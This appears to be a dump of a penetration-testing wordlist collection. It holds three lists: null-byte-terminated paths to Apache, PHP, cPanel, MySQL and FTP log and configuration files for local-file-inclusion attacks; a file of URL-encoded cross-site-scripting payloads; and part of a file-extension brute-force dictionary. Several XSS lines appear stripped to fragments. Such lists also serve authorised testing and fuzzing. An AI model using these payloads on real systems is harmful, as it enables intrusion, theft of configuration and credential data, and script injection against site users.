65 | /logs/access.log%00
66 | /logs/error.log%00
67 | /logs/access.log%00
68 | /logs/error.log%00
69 | /logs/access.log%00
70 | /logs/error.log%00
71 | /logs/access.log%00
72 | /logs/error.log%00
73 | /logs/access.log%00
74 | /etc/httpd/logs/acces_log%00
75 | /etc/httpd/logs/acces.log%00
76 | /etc/httpd/logs/error_log%00
77 | /etc/httpd/logs/error.log%00
78 | /usr/local/apache/logs/access_log%00
79 | /usr/local/apache/logs/access.log%00
80 | /usr/local/apache/logs/error_log%00
81 | /usr/local/apache/logs/error.log%00
82 | /usr/local/apache2/logs/access_log%00
83 | /usr/local/apache2/logs/access.log%00
84 | /usr/local/apache2/logs/error_log%00
85 | /usr/local/apache2/logs/error.log%00
86 | /var/www/logs/access_log%00
87 | /var/www/logs/access.log%00
88 | /var/www/logs/error_log%00
89 | /var/www/logs/error.log%00
90 | /var/log/httpd/access_log%00
91 | /var/log/httpd/access.log%00
92 | /var/log/httpd/error_log%00
93 | /var/log/httpd/error.log%00
94 | /var/log/apache/access_log%00
95 | /var/log/apache/access.log%00
96 | /var/log/apache/error_log%00
97 | /var/log/apache/error.log%00
98 | /var/log/apache2/access_log%00
99 | /var/log/apache2/access.log%00
100 | /var/log/apache2/error_log%00
101 | /var/log/apache2/error.log%00
102 | /var/log/access_log%00
103 | /var/log/access.log%00
104 | /var/log/error_log%00
105 | /var/log/error.log%00
106 | /opt/lampp/logs/access_log%00
107 | /opt/lampp/logs/error_log%00
108 | /opt/xampp/logs/access_log%00
109 | /opt/xampp/logs/error_log%00
110 | /opt/lampp/logs/access.log%00
111 | /opt/lampp/logs/error.log%00
112 | /opt/xampp/logs/access.log%00
113 | /opt/xampp/logs/error.log%00
114 | /Program Files\Apache Group\Apache\logs\access.log%00
115 | /Program Files\Apache Group\Apache\logs\error.log%00
116 | /apache/logs/error.log%00
117 | /apache/logs/access.log%00
118 | /apache/logs/error.log%00
119 | /apache/logs/access.log%00
120 | /apache/logs/error.log%00
121 | /apache/logs/access.log%00
122 | /apache/logs/error.log%00
123 | /apache/logs/access.log%00
124 | /apache/logs/error.log%00
125 | /apache/logs/access.log%00
126 | /apache/logs/error.log%00
127 | /apache/logs/access.log%00
128 | /logs/error.log%00
129 | /logs/access.log%00
130 | /logs/error.log%00
131 | /logs/access.log%00
132 | /logs/error.log%00
133 | /logs/access.log%00
134 | /logs/error.log%00
135 | /logs/access.log%00
136 | /logs/error.log%00
137 | /logs/access.log%00
138 | /logs/error.log%00
139 | /logs/access.log%00
140 | /etc/httpd/logs/acces_log%00
141 | /etc/httpd/logs/acces.log%00
142 | /etc/httpd/logs/error_log%00
143 | /etc/httpd/logs/error.log%00
144 | /var/www/logs/access_log%00
145 | /var/www/logs/access.log%00
146 | /usr/local/apache/logs/access_log%00
147 | /usr/local/apache/logs/access.log%00
148 | /var/log/apache/access_log%00
149 | /var/log/apache/access.log%00
150 | /var/log/access_log%00
151 | /var/www/logs/error_log%00
152 | /var/www/logs/error.log%00
153 | /usr/local/apache/logs/error_log%00
154 | /usr/local/apache/logs/error.log%00
155 | /var/log/apache/error_log%00
156 | /var/log/apache/error.log%00
157 | /var/log/access_log%00
158 | /var/log/error_log%00
159 | /usr/local/apache/conf/httpd.conf%00
160 | /usr/local/apache2/conf/httpd.conf%00
161 | /etc/httpd/conf/httpd.conf%00
162 | /etc/apache/conf/httpd.conf%00
163 | /usr/local/etc/apache/conf/httpd.conf%00
164 | /etc/apache2/httpd.conf%00
165 | /usr/local/apache/conf/httpd.conf%00
166 | /usr/local/apache2/conf/httpd.conf%00
167 | /usr/local/apache/httpd.conf%00
168 | /usr/local/apache2/httpd.conf%00
169 | /usr/local/httpd/conf/httpd.conf%00
170 | /usr/local/etc/apache/conf/httpd.conf%00
171 | /usr/local/etc/apache2/conf/httpd.conf%00
172 | /usr/local/etc/httpd/conf/httpd.conf%00
173 | /usr/apache2/conf/httpd.conf%00
174 | /usr/apache/conf/httpd.conf%00
175 | /usr/local/apps/apache2/conf/httpd.conf%00
176 | /usr/local/apps/apache/conf/httpd.conf%00
177 | /etc/apache/conf/httpd.conf%00
178 | /etc/apache2/conf/httpd.conf%00
179 | /etc/httpd/conf/httpd.conf%00
180 | /etc/http/conf/httpd.conf%00
181 | /etc/apache2/httpd.conf%00
182 | /etc/httpd/httpd.conf%00
183 | /etc/http/httpd.conf%00
184 | /etc/httpd.conf%00
185 | /opt/apache/conf/httpd.conf%00
186 | /opt/apache2/conf/httpd.conf%00
187 | /var/www/conf/httpd.conf%00
188 | /private/etc/httpd/httpd.conf%00
189 | /private/etc/httpd/httpd.conf.default%00
190 | /Volumes/webBackup/opt/apache2/conf/httpd.conf%00
191 | /Volumes/webBackup/private/etc/httpd/httpd.conf%00
192 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
193 | /Program Files\Apache Group\Apache\conf\httpd.conf%00
194 | /Program Files\Apache Group\Apache2\conf\httpd.conf%00
195 | /Program Files\xampp\apache\conf\httpd.conf%00
196 | /usr/local/php/httpd.conf.php%00
197 | /usr/local/php4/httpd.conf.php%00
198 | /usr/local/php5/httpd.conf.php%00
199 | /usr/local/php/httpd.conf%00
200 | /usr/local/php4/httpd.conf%00
201 | /usr/local/php5/httpd.conf%00
202 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
203 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
204 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
205 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
206 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
207 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
208 | /usr/local/etc/apache/vhosts.conf%00
209 | /etc/php.ini%00
210 | /bin/php.ini%00
211 | /etc/httpd/php.ini%00
212 | /usr/lib/php.ini%00
213 | /usr/lib/php/php.ini%00
214 | /usr/local/etc/php.ini%00
215 | /usr/local/lib/php.ini%00
216 | /usr/local/php/lib/php.ini%00
217 | /usr/local/php4/lib/php.ini%00
218 | /usr/local/php5/lib/php.ini%00
219 | /usr/local/apache/conf/php.ini%00
220 | /etc/php4.4/fcgi/php.ini%00
221 | /etc/php4/apache/php.ini%00
222 | /etc/php4/apache2/php.ini%00
223 | /etc/php5/apache/php.ini%00
224 | /etc/php5/apache2/php.ini%00
225 | /etc/php/php.ini%00
226 | /etc/php/php4/php.ini%00
227 | /etc/php/apache/php.ini%00
228 | /etc/php/apache2/php.ini%00
229 | /web/conf/php.ini%00
230 | /usr/local/Zend/etc/php.ini%00
231 | /opt/xampp/etc/php.ini%00
232 | /var/local/www/conf/php.ini%00
233 | /etc/php/cgi/php.ini%00
234 | /etc/php4/cgi/php.ini%00
235 | /etc/php5/cgi/php.ini%00
236 | /php5\php.ini%00
237 | /php4\php.ini%00
238 | /php\php.ini%00
239 | /PHP\php.ini%00
240 | /WINDOWS\php.ini%00
241 | /WINNT\php.ini%00
242 | /apache\php\php.ini%00
243 | /xampp\apache\bin\php.ini%00
244 | /NetServer\bin\stable\apache\php.ini%00
245 | /home2\bin\stable\apache\php.ini%00
246 | /home\bin\stable\apache\php.ini%00
247 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
248 | /usr/local/cpanel/logs%00
249 | /usr/local/cpanel/logs/stats_log%00
250 | /usr/local/cpanel/logs/access_log%00
251 | /usr/local/cpanel/logs/error_log%00
252 | /usr/local/cpanel/logs/license_log%00
253 | /usr/local/cpanel/logs/login_log%00
254 | /usr/local/cpanel/logs/stats_log%00
255 | /var/cpanel/cpanel.config%00
256 | /var/log/mysql/mysql-bin.log%00
257 | /var/log/mysql.log%00
258 | /var/log/mysqlderror.log%00
259 | /var/log/mysql/mysql.log%00
260 | /var/log/mysql/mysql-slow.log%00
261 | /var/mysql.log%00
262 | /var/lib/mysql/my.cnf%00
263 | /etc/mysql/my.cnf%00
264 | /etc/my.cnf%00
265 | /etc/logrotate.d/proftpd%00
266 | /www/logs/proftpd.system.log%00
267 | /var/log/proftpd%00
268 | /etc/proftp.conf%00
269 | /etc/protpd/proftpd.conf%00
270 | /etc/vhcs2/proftpd/proftpd.conf%00
271 | /etc/proftpd/modules.conf%00
272 | /var/log/vsftpd.log%00
273 | /etc/vsftpd.chroot_list%00
274 | /etc/logrotate.d/vsftpd.log%00
275 | /etc/vsftpd/vsftpd.conf%00
276 | /etc/vsftpd.conf%00
277 | /etc/chrootUsers%00
278 | /var/log/xferlog%00
279 | /var/adm/log/xferlog%00
280 | /etc/wu-ftpd/ftpaccess%00
281 | /etc/wu-ftpd/ftphosts%00
282 | /etc/wu-ftpd/ftpusers%00
283 | /usr/sbin/pure-config.pl%00
284 | /usr/etc/pure-ftpd.conf%00
285 | /etc/pure-ftpd/pure-ftpd.conf%00
286 | /usr/local/etc/pure-ftpd.conf%00
287 | /usr/local/etc/pureftpd.pdb%00
288 | /usr/local/pureftpd/etc/pureftpd.pdb%00
289 | /usr/local/pureftpd/sbin/pure-config.pl%00
290 | /usr/local/pureftpd/etc/pure-ftpd.conf%00
291 | /etc/pure-ftpd.conf%00
292 | /etc/pure-ftpd/pure-ftpd.pdb%00
293 | /etc/pureftpd.pdb%00
294 | /etc/pureftpd.passwd%00
295 | /etc/pure-ftpd/pureftpd.pdb%00
296 | /usr/ports/ftp/pure-ftpd/%00
297 | /usr/ports/net/pure-ftpd/%00
298 | /usr/pkgsrc/net/pureftpd/%00
299 | /usr/ports/contrib/pure-ftpd/%00
300 | /var/log/pure-ftpd/pure-ftpd.log%00
301 | /logs/pure-ftpd.log%00
302 | /var/log/pureftpd.log%00
303 | /var/log/ftp-proxy/ftp-proxy.log%00
304 | /var/log/ftp-proxy%00
305 | /var/log/ftplog%00
306 | /etc/logrotate.d/ftp%00
307 | /etc/ftpchroot%00
308 | /etc/ftphosts%00
309 | /var/log/exim_mainlog%00
310 | /var/log/exim/mainlog%00
311 | /var/log/maillog%00
312 | /var/log/exim_paniclog%00
313 | /var/log/exim/paniclog%00
314 | /var/log/exim/rejectlog%00
315 | /var/log/exim_rejectlog%00
--------------------------------------------------------------------------------
/XSS测试/XSSalertTest.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 | ">
4 | ">
5 | =><>
6 | =><>
7 | =">
8 | =">
9 | ='>
10 | ='>
11 | ="><
12 | ="><
13 | ='><
14 | ='><
15 |
16 |
17 | ">
18 | ">
19 | =><>
20 | =><>
21 | =">
22 | =">
23 | ='>
24 | ='>
25 | ="><
26 | ="><
27 | ='><
28 | ='><
29 | "%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
30 | "%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
31 | =%3e%3c%3e%3cscript>alert('XSS')%3c%2fscript%3e
32 | =%3e%3c%3e%3cScRiPt>AlErT('XSS')%3c%2fScRiPt%3e
33 | ="%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
34 | ="%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
35 | ='%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
36 | ='%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
37 | ="%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
38 | ="%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
39 | ='%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
40 | ='%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
41 | \\>
42 | \\>
43 | =><>
44 | =><>
45 | =\\>
46 | =\\>
47 | =\>
48 | =\>
49 | =\\><
50 | =\\><
51 | =\><
52 | =\><
53 | "%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
54 | "%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
55 | =%3e%3c%3e%3cscript>alert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
56 | =%3e%3c%3e%3cScRiPt>AlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
57 | ="%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
58 | ="%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
59 | ='%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
60 | ='%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
61 | ="%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
62 | ="%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
63 | ='%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
64 | ='%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
65 | \\>
66 | \\>
67 | =><>
68 | =><>
69 | =\\>
70 | =\\>
71 | =\>
72 | =\>
73 | =\\><
74 | =\\><
75 | =\><
76 | =\><
77 | %5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
78 | %5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
79 | =%3e%3c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
80 | =%3e%3c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
81 | =%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
82 | =%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
83 | =%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
84 | =%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
85 | =%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
86 | =%5c%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
87 | =%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
88 | =%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
89 | %5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
90 | %5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
91 | =%3e%3c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
92 | =%3e%3c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
93 | =%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
94 | =%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
95 | =%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
96 | =%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
97 | =%5c%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
98 | =%5c%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
99 | =%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
100 | =%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
101 |
102 |
103 | ">
104 | ">
105 | =><>
106 | =><>
107 | =">
108 | =">
109 | ='>
110 | ='>
111 | ="><
112 | ="><
113 | ='><
114 | ='><
115 |
116 |
117 | ">
118 | ">
119 | =><>
120 | =><>
121 | =">
122 | =">
123 | ='>
124 | ='>
125 | ="><
126 | ="><
127 | ='><
128 | ='><
129 | "%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
130 | "%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
131 | =%3e%3c%3e%3cscript>prompt('XSS')%3c%2fscript%3e
132 | =%3e%3c%3e%3cScRiPt>PrOmPt('XSS')%3c%2fScRiPt%3e
133 | ="%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
134 | ="%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
135 | ='%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
136 | ='%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
137 | ="%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
138 | ="%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
139 | ='%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
140 | ='%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
141 | \\>
142 | \\>
143 | =><>
144 | =><>
145 | =\\>
146 | =\\>
147 | =\>
148 | =\>
149 | =\\><
150 | =\\><
151 | =\><
152 | =\><
153 | "%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
154 | "%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
155 | =%3e%3c%3e%3cscript>prompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
156 | =%3e%3c%3e%3cScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
157 | ="%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
158 | ="%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
159 | ='%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
160 | ='%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
161 | ="%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
162 | ="%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
163 | ='%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
164 | ='%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
165 | \\>
166 | \\>
167 | =><>
168 | =><>
169 | =\\>
170 | =\\>
171 | =\>
172 | =\>
173 | =\\><
174 | =\\><
175 | =\><
176 | =\><
177 | %5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
178 | %5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
179 | =%3e%3c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
180 | =%3e%3c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
181 | =%5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
182 | =%5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
183 | =%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
184 | =%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
185 | =%5c%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
186 | =%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
187 | =%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
188 | =%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
189 | %5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
190 | %5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
191 | =%3e%3c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
192 | =%3e%3c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
193 | =%5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
194 | =%5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
195 | =%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
196 | =%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
197 | =%5c%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
198 | =%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
199 | =%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
200 | =%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
--------------------------------------------------------------------------------
/Password dictionary/1000多个扩展名.dict:
--------------------------------------------------------------------------------
1 | $er
2 | ^^^
3 | {pb
4 | ~hm
5 | 0
6 | 000
7 | 123
8 | 1pe
9 | 1ph
10 | 3dr
11 | 3dt
12 | 3me
13 | 3pe
14 | 4dl
15 | 4dv
16 | 7z
17 | 8xk
18 | a00
19 | a01
20 | a02
21 | a3l
22 | a3m
23 | a3w
24 | a4l
25 | a4m
26 | a4w
27 | a5l
28 | a5w
29 | a65
30 | aao
31 | ab
32 | ab1
33 | ab2
34 | ab3
35 | abcd
36 | abi
37 | abp
38 | aby
39 | aca
40 | acc
41 | accdb
42 | ace
43 | acf
44 | acg
45 | ade
46 | adp
47 | adt
48 | adx
49 | aft
50 | agd
51 | aifb
52 | ain
53 | alc
54 | ald
55 | ali
56 | alz
57 | amb
58 | amsorm
59 | an1
60 | anme
61 | apr
62 | apz
63 | ar
64 | arc
65 | arh
66 | ari
67 | arj
68 | ark
69 | ask
70 | asm
71 | ast
72 | at5
73 | att
74 | aw
75 | awg
76 | axx
77 | azw
78 | b64
79 | ba
80 | bafl
81 | bci
82 | bcm
83 | bdf
84 | bdic
85 | bfx
86 | bgl
87 | bgt
88 | bh
89 | bin
90 | bjo
91 | bk
92 | bkk
93 | blb
94 | bld
95 | blg
96 | bok
97 | boo
98 | box
99 | brd
100 | brw
101 | btf
102 | btif
103 | btm
104 | btr
105 | bz
106 | bz2
107 | bzip
108 | bzip2
109 | c00
110 | c01
111 | c02
112 | cap
113 | car
114 | cat
115 | cb7
116 | cbg
117 | cbr
118 | cbt
119 | cbz
120 | cch
121 | ccr
122 | cct
123 | cdb
124 | cdd
125 | cdf
126 | cdp
127 | cdr
128 | cdx
129 | cel
130 | celtx
131 | chg
132 | chk
133 | chn
134 | ckd
135 | ckt
136 | cl2
137 | cl4
138 | clb
139 | clix
140 | clm
141 | clp
142 | cmbl
143 | cna
144 | contact
145 | cp9
146 | cpgz
147 | cpi
148 | cpmz
149 | cpt
150 | crd
151 | crtx
152 | csa
153 | csv
154 | ctf
155 | ctt
156 | cursorfx
157 | curxptheme
158 | cvd
159 | cvn
160 | cwk
161 | cws
162 | cwz
163 | cxt
164 | cyo
165 | cys
166 | daf
167 | dal
168 | dam
169 | dar
170 | das
171 | dat
172 | data
173 | db
174 | db2
175 | db3
176 | dbc
177 | dbd
178 | dbf
179 | dbx
180 | dcf
181 | dcl
182 | dcm
183 | dcmd
184 | dd
185 | ddc
186 | ddcx
187 | ddt
188 | deb
189 | dem
190 | des
191 | dex
192 | dfm
193 | dfproj
194 | dft
195 | dgb
196 | dgc
197 | dif
198 | dii
199 | dist
200 | dlg
201 | dm2
202 | dmo
203 | dmsk
204 | dnc
205 | dockzip
206 | dp1
207 | dpn
208 | dpx
209 | drl
210 | dsb
211 | dsd
212 | dsk
213 | dsy
214 | dsz
215 | dt0
216 | dt1
217 | dt2
218 | dta
219 | dtr
220 | dvdproj
221 | dvo
222 | dwi
223 | e00
224 | eap
225 | ebuild
226 | ec0
227 | eco
228 | ecs
229 | ecx
230 | edb
231 | edf
232 | eep
233 | efw
234 | efx
235 | egp
236 | emb
237 | emd
238 | emlxpart
239 | enc
240 | enw
241 | epi
242 | epp
243 | epub
244 | epw
245 | er1
246 | esp
247 | ess
248 | est
249 | esx
250 | et
251 | eta
252 | etd
253 | etl
254 | ev
255 | ev3
256 | evt
257 | evy
258 | exif
259 | exp
260 | exx
261 | f
262 | fa
263 | fasta
264 | fbl
265 | fcd
266 | fcs
267 | fdb
268 | fdp
269 | ffd
270 | ffwp
271 | fhc
272 | fid
273 | fil
274 | flame
275 | fll
276 | flo
277 | flp
278 | flt
279 | fm
280 | fm5
281 | fmp
282 | fo
283 | fob
284 | fol
285 | fop
286 | fox
287 | fp
288 | fp3
289 | fp4
290 | fp5
291 | fp7
292 | frl
293 | frm
294 | fro
295 | frx
296 | fsb
297 | fsc
298 | ftm
299 | ftw
300 | gan
301 | gbr
302 | gc
303 | gca
304 | gcx
305 | gdb
306 | ged
307 | gedcom
308 | gen
309 | ggb
310 | gml
311 | gms
312 | gno
313 | gnp
314 | gp3
315 | gpi
316 | gps
317 | gpx
318 | gra
319 | grade
320 | grf
321 | grib
322 | grk
323 | grr
324 | grv
325 | gs
326 | gst
327 | gtp
328 | gwk
329 | gxl
330 | gz
331 | gzi
332 | gzip
333 | ha
334 | hbc
335 | hbc2
336 | hbe
337 | hcc
338 | hce
339 | hci
340 | hcp
341 | hcr
342 | hcu
343 | hda
344 | hdb
345 | hdf
346 | hdi
347 | hdl
348 | hif
349 | hki
350 | hki1
351 | hki2
352 | hki3
353 | hl
354 | hml
355 | hmt
356 | hpk
357 | hs2
358 | hsk
359 | hst
360 | htg
361 | huh
362 | hyp
363 | hyv
364 | i5z
365 | ib
366 | ice
367 | ics
368 | id2
369 | idx
370 | igc
371 | ihx
372 | ii
373 | iif
374 | img
375 | imt
376 | ink
377 | inp
378 | ins
379 | ip
380 | ipg
381 | ipk
382 | irock
383 | irr
384 | irx
385 | isf
386 | ish
387 | itdb
388 | itl
389 | itm
390 | itn
391 | itw
392 | itx
393 | ivt
394 | iw
395 | ixb
396 | j
397 | jar.pack
398 | jasper
399 | jdb
400 | jef
401 | jgz
402 | jic
403 | jmp
404 | jnt
405 | job
406 | joboptions
407 | joined
408 | jph
409 | jrprint
410 | jrxml
411 | jude
412 | kap
413 | kdb
414 | kgb
415 | kid
416 | kismac
417 | kmz
418 | kpf
419 | kpp
420 | kpr
421 | kpx
422 | kpz
423 | l
424 | l6t
425 | laccdb
426 | lbl
427 | lbr
428 | lbx
429 | lcd
430 | lcf
431 | lcm
432 | ldif
433 | lemon
434 | lex
435 | lgc
436 | lgf
437 | lgh
438 | lgi
439 | lgl
440 | lha
441 | lib
442 | lif
443 | livereg
444 | liveupdate
445 | lix
446 | llb
447 | lms
448 | lmx
449 | lnt
450 | lnx
451 | loc
452 | lp7
453 | lqr
454 | lrf
455 | lrs
456 | lrx
457 | lsf
458 | lsl
459 | lsp
460 | lsr
461 | lst
462 | lsu
463 | lvm
464 | lw4
465 | ly
466 | lz
467 | lzh
468 | lzm
469 | lzma
470 | lzo
471 | lzx
472 | m
473 | mag
474 | mai
475 | map
476 | masseffectprofile
477 | mat
478 | mbb
479 | mbf
480 | mbg
481 | mbl
482 | mbp
483 | mbx
484 | mc1
485 | mc9
486 | mcd
487 | md
488 | mdb
489 | mdc
490 | mdf
491 | mdl
492 | mdm
493 | mdn
494 | mdt
495 | mdx
496 | mdz
497 | mem
498 | menc
499 | met
500 | mex
501 | mfo
502 | mfp
503 | mgc
504 | mint
505 | mls
506 | mm
507 | mmap
508 | mmc
509 | mmf
510 | mmp
511 | mnc
512 | mng
513 | mnk
514 | mno
515 | mny
516 | mobi
517 | moho
518 | mosaic
519 | mou
520 | mox
521 | mpd
522 | mpj
523 | mpkg
524 | mpp
525 | mpt
526 | mpx
527 | mpz
528 | mq4
529 | ms10
530 | mth
531 | mtw
532 | mud
533 | muf
534 | mw
535 | mwf
536 | mws
537 | mwx
538 | mxd
539 | myd
540 | myi
541 | mzp
542 | nb
543 | nc
544 | ndf
545 | ndk
546 | ndx
547 | net
548 | neta
549 | nfo
550 | nitf
551 | nmind
552 | not
553 | notebook
554 | np
555 | npl
556 | npt
557 | nrl
558 | ns2
559 | ns3
560 | ns4
561 | nsf
562 | ntx
563 | numbers
564 | nvl
565 | nyf
566 | oab
567 | oar
568 | obj
569 | odb
570 | odf
571 | odp
572 | ods
573 | odx
574 | oeaccount
575 | ofc
576 | ofm
577 | oft
578 | ofx
579 | omcs
580 | omp
581 | ond
582 | one
583 | oo3
584 | opf
585 | opx
586 | or2
587 | or3
588 | or4
589 | or5
590 | or6
591 | org
592 | orx
593 | otf
594 | otl
595 | otln
596 | ots
597 | out
598 | ov2
599 | ova
600 | ovf
601 | p7m
602 | p96
603 | p97
604 | pab
605 | pack.gz
606 | package
607 | pae
608 | paf
609 | pak
610 | pan
611 | paq6
612 | paq7
613 | paq8
614 | par
615 | par2
616 | pbd
617 | pbi
618 | pc
619 | pcap
620 | pcb
621 | pcr
622 | pcv
623 | pd4
624 | pd5
625 | pdas
626 | pdb
627 | pdd
628 | pdm
629 | pds
630 | pdx
631 | pea
632 | peb
633 | pec
634 | pep
635 | pet
636 | pex
637 | pf
638 | pfc
639 | pfl
640 | phb
641 | phm
642 | pi
643 | pim
644 | pis
645 | pit
